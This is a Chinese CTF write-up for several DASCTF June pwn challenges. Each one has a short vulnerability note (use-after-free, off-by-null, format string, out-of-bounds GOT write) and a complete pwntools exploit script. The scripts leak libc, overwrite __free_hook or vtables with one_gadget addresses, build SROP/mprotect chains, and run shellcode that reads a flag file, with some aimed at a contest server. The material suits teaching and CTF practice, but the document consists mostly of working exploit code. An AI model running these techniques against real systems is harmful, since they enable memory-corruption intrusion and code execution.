Dasctf 6月赛其余pwn WP

copy:

这题主要是堆风水的利用。通过运行我们可以发现，每次申请块之后都会free掉这个块，但是接下来执行删除操作的时候仍然可以使用这个指针，因此存在UAF漏洞；剩下的就是堆风水的利用了，不再赘述。
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
# context.log_level = 'debug'

binary = 'copy11'
elf = ELF('copy11')
libc = elf.libc
context.binary = binary

# DEBUG truthy -> run the binary locally; otherwise talk to the contest service.
DEBUG = 0
if not DEBUG:
    host = "183.129.189.60"
    port = 10034
    p = remote(host, port)
else:
    p = process(binary)
    # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})

# Offset tables carried over from the script template. In this script o_g is
# reassigned further down before it is read, and magic is never read.
o_g = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
magic = [0x3c4b10, 0x3c67a8, 0x846c0, 0x45390]  # malloc,free,realloc,system


def l64():
    """Receive up to the next 0x7f byte and unpack the 6 bytes before it as a 64-bit value."""
    tail = p.recvuntil("\x7f")[-6:]
    return u64(tail.ljust(8, "\x00"))


def l32():
    """Receive up to the next 0xf7 byte and unpack the 4 bytes before it as a 32-bit value."""
    tail = p.recvuntil("\xf7")[-4:]
    return u32(tail.ljust(4, "\x00"))


def sla(a, b):
    """Wait for prompt *a*, then send *b* plus a newline (both are str()-ed)."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """Wait for prompt *a*, then send *b* with no trailing newline (both are str()-ed)."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log *data* in hex under the label *name*."""
    return p.success(name + ": 0x%x" % data)


def se(payload):
    """Send *payload* as-is."""
    return p.send(payload)


def rl():
    """Receive whatever the target has sent so far."""
    return p.recv()


def sl(payload):
    """Send *payload* followed by a newline."""
    return p.sendline(payload)


def ru(a):
    """Receive until the marker *a* (str()-ed) has been seen."""
    return p.recvuntil(str(a))
def cmd(idx):
    """Answer the "choice:" menu prompt with option *idx*."""
    choice = str(idx)
    sla("choice:", choice)
def add(idx, size, payload):
    """Allocate through submenu *idx*.

    Selects submenu *idx*, then its entry 1.  The size prompt is only answered
    for submenu 1; the data prompt is answered with *payload* in both cases.
    """
    cmd(idx)
    cmd(1)  # entry 1 is "add" in either submenu; the original sent it on both branches
    if idx == 1:
        sla("input size:", str(size))
    sa("input data:", payload)
def free(idx, idx1):
    """Select submenu *idx*, entry 2, and release slot *idx1*."""
    cmd(idx)
    cmd(2)
    slot = str(idx1)
    sla("index?\n", slot)
def show(idx, idx1):
    """Select submenu *idx*, entry 3, and print slot *idx1*."""
    cmd(idx)
    cmd(3)
    slot = str(idx1)
    sla("index?\n", slot)

# Solve sequence for copy11.  Every call exchanges data with the target, so
# statement order and the exact bytes sent must be preserved.
add(1,0x90,"a")
free(1,0)
add(1,0x90,"aaa")
show(1,0)
ru("data: ")
# The 6 bytes printed after "data: " are a heap pointer; pad to 8 and unpack.
heap_addr = u64(p.recv(6).ljust(8,"\x00"))
lg("heap_addr",heap_addr)
add(1,0x90,p64(heap_addr-0x11f00-0xb0+0x10))
free(1,0)
free(1,1)
add(2,0x90,p64(heap_addr-0x11e00-0xb0+0x10))
# Heap-relative layout written into a chunk; the constants are specific to
# this binary's heap state and were presumably found under a debugger.
payload = p64(0x101)+p64(0x0108)
payload += p64(0)*6
payload += p64(heap_addr-0x11e00-0xb0+0x10+0x60)
payload += p64(heap_addr+0xa0)
payload += p64(0)+p64(0x31)
payload += p64(0)*3+p64(0x21)
payload += p64(heap_addr+0xb0+0x10-0x20)
payload += p64(heap_addr-0x11e00-0xb0+0x10+0x50)
add(2,0x90,payload)
show(1,0)
# 0x3ebca0 is the hard-coded distance from the leaked pointer to the libc base.
libc_base = l64()-0x3ebca0
lg("libc_base",libc_base)
free_hook = libc_base+libc.sym["__free_hook"]
sys_addr = libc_base+libc.sym["system"]  # computed but not used below
payload = p64(0)*5+p64(0x31)+p64(0)*5
# Replaces the o_g table from the setup section; only index 1 is read.
o_g = [0x4f2c5,0x4f322,0x10a38c]
one = o_g[1]+libc_base
free(2,1)
add(2,0x90,payload)
add(1,0x18,p64(free_hook)*3)
free(1,1)
add(1,0x60,p64(one))
# gdb.attach(p)
p.interactive()
easyheap:
溢出点:

libc2.27下的off by null可以参考cnitlrt,本题和我的简书上的第二个题的利用手法类似加了个沙盒:
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
# context.log_level = 'debug'

binary = 'ezheap'
elf = ELF('ezheap')
libc = elf.libc
context.binary = binary

# DEBUG truthy -> run the binary locally; otherwise talk to the contest service.
DEBUG = 0
if not DEBUG:
    host = "183.129.189.60"
    port = 10027
    p = remote(host, port)
else:
    p = process(binary)
    # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})

# Offset tables carried over from the script template; neither is read by this script.
o_g = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
magic = [0x3c4b10, 0x3c67a8, 0x846c0, 0x45390]  # malloc,free,realloc,system


def l64():
    """Receive up to the next 0x7f byte and unpack the 6 bytes before it as a 64-bit value."""
    tail = p.recvuntil("\x7f")[-6:]
    return u64(tail.ljust(8, "\x00"))


def l32():
    """Receive up to the next 0xf7 byte and unpack the 4 bytes before it as a 32-bit value."""
    tail = p.recvuntil("\xf7")[-4:]
    return u32(tail.ljust(4, "\x00"))


def sla(a, b):
    """Wait for prompt *a*, then send *b* plus a newline (both are str()-ed)."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """Wait for prompt *a*, then send *b* with no trailing newline (both are str()-ed)."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log *data* in hex under the label *name*."""
    return p.success(name + ": 0x%x" % data)


def se(payload):
    """Send *payload* as-is."""
    return p.send(payload)


def rl():
    """Receive whatever the target has sent so far."""
    return p.recv()


def sl(payload):
    """Send *payload* followed by a newline."""
    return p.sendline(payload)


def ru(a):
    """Receive until the marker *a* (str()-ed) has been seen."""
    return p.recvuntil(str(a))
def cmd(idx):
    """Answer the "Your Choice: " menu prompt with option *idx*."""
    choice = str(idx)
    sla("Your Choice: ", choice)
def add(idx, size, payload):
    """Menu 1: allocate slot *idx* of *size* bytes and fill it with *payload*."""
    cmd(1)
    for prompt, value in (("index>> ", idx), ("size>> ", size)):
        sla(prompt, str(value))
    sa('name>> ', payload)
def free(idx):
    """Menu 2: release slot *idx*."""
    cmd(2)
    slot = str(idx)
    sla("index>> ", slot)
def show(idx):
    """Menu 3: print slot *idx*."""
    cmd(3)
    slot = str(idx)
    sla("index>> ", slot)
def edit(idx, payload):
    """Menu 4: overwrite the contents of slot *idx* with *payload*."""
    cmd(4)
    slot = str(idx)
    sla("index>> ", slot)
    sa('name>> ', payload)
# Solve sequence for ezheap.  Every call exchanges data with the target, so
# statement order and the exact bytes sent must be preserved.
for i in range(7):
    add(i,0x68,"aaaa")
for i in range(7):
    add(i+7,0xf8,"aaaa")
add(14,0xf8,"aaaa")#14
add(15,0x68,"aaaa")#15
add(16,0xf8,"aaaa")#16
add(17,0x68,"aaaa")#17
for i in range(14):
    free(i)
free(15)
free(14)
# 0x68 bytes requested, 0x60 filler + an 8-byte size field written: the
# write-up above calls this the off-by-null spot.
add(0,0x68,"a"*0x60+p64(0x100+0x70))
free(16)
add(19,0x110,"a"*0xf0+p64(0)+p64(0x101))
add(18,0x140,"aaaa")
edit(18,"a"*0xd0+p64(0)+p64(0x21)+p64(0)+p64(0x21)*3)
free(0)
show(19)
# 0x3ebca0 is the hard-coded distance from the leaked pointer to the libc base.
libc_base = l64()-0x3ebca0
lg("libc_base",libc_base)
free_hook = libc_base+libc.sym["__free_hook"]
setcontext = 0x520a5+libc_base  # hard-coded offset into setcontext for this libc build
edit(19,"\x00"*0xf0+p64(0)+p64(0x101)+p64(0)+p64(free_hook-0x20))
add(0,0xf8,"\x00")
edit(19,"\x00"*0xf0+p64(0)+p64(0x71))
edit(18,"\x00"*0x40+p64(0)+p64(0x21)*3)
free(0)
edit(19,"\x00"*0xf0+p64(0)+p64(0x71)+p64(free_hook-0x13))
add(0,0x68,"\x00")
add(1,0x68,"\x00"*3+p64(setcontext))
# Page containing __free_hook; used as the base of the scratch region below.
free_hook1 = free_hook&0xfffffffffffff000
# Gadget offsets are hard-coded for the contest libc.
syscall = 0x00000000000d2975+libc_base
pop_rdi = 0x000000000002155f+libc_base
pop_rsi = 0x0000000000023e6a+libc_base
pop_rdx = 0x0000000000001b96+libc_base
pop_rax = 0x00000000000439c8+libc_base
# rax=10 is mprotect on x86-64: the chain remaps the page for rwx (0x7) and
# then continues into the shellcode appended after it.
payload = [pop_rdi,free_hook1,pop_rsi,0x2000,pop_rdx,0x7,pop_rax,10,syscall,0x0000000000002b1d+libc_base]
frame = SigreturnFrame()
frame.rdi = 0
frame.rsi = free_hook1
frame.rdx = 0x2000
frame.rsp = free_hook1
frame.rip = syscall
fa = str(frame)
edit(18,fa)
free(18)
# Seccomp-aware payload: openat/read/write only (see the sandbox remark above).
sc = """
mov rax, 0x67616c662f
push rax

mov rdi, 0
mov rsi, rsp
mov rdx, 0
mov rax, SYS_openat
syscall				;//openat(0, "/flag", 0)

mov rdi, rax
mov rsi, rsp
mov rdx, 0x100		
mov rax, SYS_read
syscall				;//read(fp, rsp, 0x100)

mov rdi, 1
mov rsi, rsp
mov rdx, 0x100
mov rax, SYS_write
syscall				;//write(1, rsp, 0x100)

mov rax, SYS_exit
syscall
"""	
payload = flat(payload) + asm(sc)
# gdb.attach(p)
p.send(payload)
p.interactive()
oooooorder

加了沙盒,程序的漏洞点在:

使用realloc,realloc有个特性是当size为0的时候会free掉当前堆块,由此可以造成uaf,因此:
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
# context.log_level = 'debug'

binary = 'oooorder'
elf = ELF('oooorder')
libc = elf.libc
context.binary = binary

# DEBUG is left at 1 here, so this script as written runs the binary locally.
DEBUG = 1
if not DEBUG:
    host = "183.129.189.60"
    port = 10028
    p = remote(host, port)
else:
    p = process(binary)
    # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})

# Offset tables carried over from the script template; neither is read by this script.
o_g = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
magic = [0x3c4b10, 0x3c67a8, 0x846c0, 0x45390]  # malloc,free,realloc,system


def l64():
    """Receive up to the next 0x7f byte and unpack the 6 bytes before it as a 64-bit value."""
    tail = p.recvuntil("\x7f")[-6:]
    return u64(tail.ljust(8, "\x00"))


def l32():
    """Receive up to the next 0xf7 byte and unpack the 4 bytes before it as a 32-bit value."""
    tail = p.recvuntil("\xf7")[-4:]
    return u32(tail.ljust(4, "\x00"))


def sla(a, b):
    """Wait for prompt *a*, then send *b* plus a newline (both are str()-ed)."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """Wait for prompt *a*, then send *b* with no trailing newline (both are str()-ed)."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log *data* in hex under the label *name*."""
    return p.success(name + ": 0x%x" % data)


def se(payload):
    """Send *payload* as-is."""
    return p.send(payload)


def rl():
    """Receive whatever the target has sent so far."""
    return p.recv()


def sl(payload):
    """Send *payload* followed by a newline."""
    return p.sendline(payload)


def ru(a):
    """Receive until the marker *a* (str()-ed) has been seen."""
    return p.recvuntil(str(a))
def cmd(idx):
    """Answer the "Your choice :" menu prompt with option *idx*."""
    choice = str(idx)
    sla("Your choice :\n", choice)
def add(size, payload):
    """Menu 1: create an order of *size* bytes whose notes are *payload*."""
    cmd(1)
    amount = str(size)
    sla("How much is the order?\n", amount)
    sa("Order notes:\n", payload)
def show():
    """Menu 3: ask the program to print its orders."""
    listing = 3
    cmd(listing)
def edit(idx, payload):
    """Menu 2: replace the notes of order *idx* with *payload*."""
    cmd(2)
    order = str(idx)
    sla("Index of order:\n", order)
    sa("Order notes:\n", payload)
def free(idx):
    """Menu 4: delete order *idx*."""
    cmd(4)
    order = str(idx)
    sla("Index of order:\n", order)
# Solve sequence for oooorder.  Every call exchanges data with the target, so
# statement order and the exact bytes sent must be preserved.
for i in range(10):
	add(0x400,"aaaa")
free(0)
free(1)
add(0x400,"\xa0")
show()
ru("[0]:")
# 6 raw bytes after "[0]:" are a heap pointer; 0x2a0 is the hard-coded
# distance from it to the start of the heap.
heap_base = u64(p.recv(6).ljust(8,"\x00"))-0x2a0
lg("heap_base",heap_base)
add(0x400,"\xa0")
for i in range(7):
	free(i+3)
for i in range(8):
	add(0x18,"dddd")
for i in range(7):
	free(i+3)
free(0)
for i in range(7):
	add(0x400,"\xa0")
free(10)
add(0x400,"a"*0x8)
show()
# 0x3ebca0 is the hard-coded distance from the leaked pointer to the libc base.
libc_base = l64()-0x3ebca0
lg("libc_base",libc_base)
free_hook = libc_base+libc.sym["__free_hook"]
setcontext = libc_base+0x520a5  # hard-coded offset into setcontext for this libc build
# Page containing __free_hook; used as the base of the scratch region below.
free_hook1 = free_hook&0xfffffffffffff000
add(0,"")#10
add(18,"aaa")#11
free(11)
# Menu 2 is driven by hand here rather than through edit(): after the index
# prompt the script only answers "10" (see the write-up's realloc remark above).
cmd(2)
# Gadget offsets are hard-coded for the contest libc.
syscall = 0x00000000000d2975+libc_base
pop_rdi = libc_base+0x000000000002155f
pop_rsi = libc_base+0x0000000000023e6a
pop_rdx = libc_base+0x0000000000001b96
pop_rax = libc_base+0x00000000000439c8
p.recv()
p.sendline("10")
free(10)
add(0x20,p64(free_hook))
add(0x20,"aaa")
add(0x18,p64(setcontext))
frame = SigreturnFrame()
frame.rdi = 0
frame.rsi = free_hook1
frame.rdx = 0x2000
frame.rsp = free_hook1
frame.rip = syscall
fr = str(frame)
# rax=10 is mprotect on x86-64: the chain remaps the page for rwx (0x7) and
# then continues into the shellcode appended after it.
payload = [pop_rdi,free_hook1,pop_rsi,0x2000,pop_rdx,0x7,pop_rax,10,syscall,0x0000000000002b1d+libc_base]
edit(4,fr)
free(4)
# open/read/write only, matching the sandbox mentioned in the write-up.
sc = shellcraft.open("flag",0)
sc += shellcraft.read("rax",free_hook1+0x400,0x100)
sc += shellcraft.write(1,free_hook1+0x400,0x100)
payload = flat(payload)+asm(sc)
p.send(payload)
# gdb.attach(p)
p.interactive()
secret:

程序有任意地址写的漏洞,而后用fclose关闭所有流,意图很明显了就是让我们分析fclose,在我们一步一步跟进的时候发现有两个地方是我们可以控制的地方,第一个是:

对应:

此时的rbp指向vtable，因此我们可以在_IO_file_jumps+0x88的位置填上one_gadget完成利用。
第二个是:
对应:
因此我们可以在_IO_file_jumps+0x10的位置上写上one_gadget完成利用，具体根据自己的调试吧：
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
# context.log_level = 'debug'

binary = 'secret'
elf = ELF('secret')
libc = elf.libc
context.binary = binary

# DEBUG truthy -> run the binary locally; otherwise talk to the contest service.
DEBUG = 0
if not DEBUG:
    host = "183.129.189.60"
    port = 10030
    p = remote(host, port)
else:
    p = process(binary)
    # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
# Template offset tables, disabled for this script:
# o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
# magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system


def l64():
    """Receive up to the next 0x7f byte and unpack the 6 bytes before it as a 64-bit value."""
    tail = p.recvuntil("\x7f")[-6:]
    return u64(tail.ljust(8, "\x00"))


def l32():
    """Receive up to the next 0xf7 byte and unpack the 4 bytes before it as a 32-bit value."""
    tail = p.recvuntil("\xf7")[-4:]
    return u32(tail.ljust(4, "\x00"))


def sla(a, b):
    """Wait for prompt *a*, then send *b* plus a newline (both are str()-ed)."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """Wait for prompt *a*, then send *b* with no trailing newline (both are str()-ed)."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log *data* in hex under the label *name*."""
    return p.success(name + ": 0x%x" % data)


def se(payload):
    """Send *payload* as-is."""
    return p.send(payload)


def rl():
    """Receive whatever the target has sent so far."""
    return p.recv()


def sl(payload):
    """Send *payload* followed by a newline."""
    return p.sendline(payload)


def ru(a):
    """Receive until the marker *a* (str()-ed) has been seen."""
    return p.recvuntil(str(a))
"""
0xe237f execve("/bin/sh", rcx, [rbp-0x70])
constraints:
  [rcx] == NULL || rcx == NULL
  [[rbp-0x70]] == NULL || [rbp-0x70] == NULL

0xe2383 execve("/bin/sh", rcx, rdx)
constraints:
  [rcx] == NULL || rcx == NULL
  [rdx] == NULL || rdx == NULL

0xe2386 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL

0x106ef8 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
"""
# Candidate offsets from the one_gadget listing above; index 2 is the one used.
o_g = [0xe237f,0xe2383,0xe2386,0x106ef8,0x106f04]
ru("0x")
# The program prints a libc address as 12 hex digits after "0x"; the write-up
# treats it as printf's address.
libc_base = int(p.recv(12),16)-libc.sym["printf"]
lg("libc_base",libc_base)
# Target of the arbitrary write: _IO_2_1_stderr_ + 0xd8 (presumably the
# FILE's vtable pointer slot — confirm against the struct layout for this libc).
addr = libc.sym["_IO_2_1_stderr_"]+libc_base+0xd8
addr1 = 0x1e5960+libc_base
addr1 = addr1&0xffff  # only the low 16 bits are sent (p16 below)
sys_addr =libc_base+libc.sym["system"]  # computed but not used below
one = o_g[2]+libc_base
payload = p64(one)*3
p.recv()
p.send(p64(addr))
p.send(p16(addr1))
# gdb.attach(p)
p.send(payload)
p.interactive()

延伸：
在一步步跟踪的时候可以发现，那两个位置的rdx都指向了_IO_helper_jumps；我们知道在libc 2.29下setcontext的参数并非常规的rdi而是rdx，因此可以利用这一点完成libc 2.29下的setcontext利用。

springboard

非栈上的格式化字符串漏洞利用:
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
#context.log_level = 'debug'

binary = 'springboard'
elf = ELF('springboard')
libc = elf.libc
context.binary = binary

# DEBUG truthy -> run the binary locally; otherwise talk to the contest service.
DEBUG = 0
if not DEBUG:
    host = "183.129.189.60"
    port = 10029
    p = remote(host, port)
else:
    p = process(binary)
    # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})

# Offset tables carried over from the script template. In this script o_g is
# reassigned further down before it is read, and magic is never read.
o_g = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
magic = [0x3c4b10, 0x3c67a8, 0x846c0, 0x45390]  # malloc,free,realloc,system


def l64():
    """Receive up to the next 0x7f byte and unpack the 6 bytes before it as a 64-bit value."""
    tail = p.recvuntil("\x7f")[-6:]
    return u64(tail.ljust(8, "\x00"))


def l32():
    """Receive up to the next 0xf7 byte and unpack the 4 bytes before it as a 32-bit value."""
    tail = p.recvuntil("\xf7")[-4:]
    return u32(tail.ljust(4, "\x00"))


def sla(a, b):
    """Wait for prompt *a*, then send *b* plus a newline (both are str()-ed)."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """Wait for prompt *a*, then send *b* with no trailing newline (both are str()-ed)."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log *data* in hex under the label *name*."""
    return p.success(name + ": 0x%x" % data)


def se(payload):
    """Send *payload* as-is."""
    return p.send(payload)


def rl():
    """Receive whatever the target has sent so far."""
    return p.recv()


def sl(payload):
    """Send *payload* followed by a newline."""
    return p.sendline(payload)


def ru(a):
    """Receive until the marker *a* (str()-ed) has been seen."""
    return p.recvuntil(str(a))
# Solve sequence for springboard (format string not on the stack, per the
# write-up).  Every call exchanges data with the target; keep the order.
# Replaces the o_g table from the setup section; only index 0 is read.
o_g = [0x4f2c5,0x4f322,0x10a38c]
# First round only reads: three stack slots printed with %p, '-' separated.
payload = "%11$p-%13$p-%39$p"
p.recv()
p.sendline(payload)
ru("0x")
# 0x21b97 is the hard-coded distance from the first leaked value to the libc base.
libc_base = int(p.recv(12),16)-0x21b97
lg("libc_base",libc_base)
ru("0x")
addr13 = int(p.recv(12),16)
ru("0x")
addr39 = int(p.recv(12),16)
lg("addr13",addr13)
lg("addr39",addr39)
# 0xe0 below the slot-13 value; the script treats this as the return-address slot.
ret_addr = (addr13-0xe0)
lg("ret_addr",ret_addr)
one = libc_base+o_g[0]
addr1 = one&0xffff  # computed but not used; the rounds below use `one` directly
# Each later round writes 2 bytes (%hn) or 1 byte (%hhn) through a chosen
# argument slot; "Cnit" is a marker the script syncs on after each write.
payload = "%{}c%{}$hn".format((ret_addr+2)&0xffff,13)
ru("input your name:")
p.sendline(payload)
# ru("cnit")
ru("input your name:")
payload = "%{}c%{}$hhnCnit\x00".format((one>>16)&0xff,39)
p.sendline(payload)
ru("Cnit")
ru("input your name:")
payload = "%{}c%{}$hhnCnit".format(ret_addr&0xffff,13)
p.sendline(payload)
ru("Cnit")
ru("input your name:")
payload = "%{}c%{}$hnCnit".format(one&0xffff,39)
p.sendline(payload)
ru("Cnit")
ru("input your name:")
p.sendline("\x00"*0x50)
# gdb.attach(p)
p.interactive()
Memory_Monster_IV

数组上溢修改write的got表为one_gadget,getshell之后使用exec 1>&2来重定向

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
# Verbose pwntools I/O logging is left enabled for this script.
context.log_level = 'debug'

binary = 'Memory_Monster_IV'
elf = ELF('Memory_Monster_IV')
libc = ELF("libc-2.30.so")
context.binary = binary

# DEBUG is left at 1 here; the remote branch still has an empty host and port 0.
DEBUG = 1
if not DEBUG:
    host = ""
    port = 0
    p = remote(host, port)
else:
    p = process(binary)
    # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})

# Offset tables carried over from the script template; neither is read by this script.
o_g = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
magic = [0x3c4b10, 0x3c67a8, 0x846c0, 0x45390]  # malloc,free,realloc,system


def l64():
    """Receive up to the next 0x7f byte and unpack the 6 bytes before it as a 64-bit value."""
    tail = p.recvuntil("\x7f")[-6:]
    return u64(tail.ljust(8, "\x00"))


def l32():
    """Receive up to the next 0xf7 byte and unpack the 4 bytes before it as a 32-bit value."""
    tail = p.recvuntil("\xf7")[-4:]
    return u32(tail.ljust(4, "\x00"))


def sla(a, b):
    """Wait for prompt *a*, then send *b* plus a newline (both are str()-ed)."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """Wait for prompt *a*, then send *b* with no trailing newline (both are str()-ed)."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log *data* in hex under the label *name*."""
    return p.success(name + ": 0x%x" % data)


def se(payload):
    """Send *payload* as-is."""
    return p.send(payload)


def rl():
    """Receive whatever the target has sent so far."""
    return p.recv()


def sl(payload):
    """Send *payload* followed by a newline."""
    return p.sendline(payload)


def ru(a):
    """Receive until the marker *a* (str()-ed) has been seen."""
    return p.recvuntil(str(a))
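# Solve sequence for Memory_Monster_IV.  The leaked value is treated as
# execve's address and then page-aligned; the hard-coded gadget offset is
# applied to the aligned base.
libc_base = l64() - libc.sym["execve"]
libc_base = libc_base & 0xfffffffffffff000
lg("libc_base", libc_base)
write_addr = libc_base + libc.sym["write"]  # computed for reference; not sent
one = 0x10afa4 + libc_base
# The target slot is patched one byte at a time (indices -7624 and -7623):
# the low byte of `one`, then the next byte up.
addr1 = one & 0xff
addr2 = (one >> 8) & 0xff
lg("addr1", addr1)
sla("index:", "-7624")
p.recv()
p.sendline(hex(addr1))  # hex() already returns a str; the extra str() wrapper was redundant
sla("index:", "-7623")
p.recv()
# Fix: the original called strhex(), which is not defined anywhere and raised
# NameError before the second byte was ever sent.
p.sendline(hex(addr2))
p.interactive()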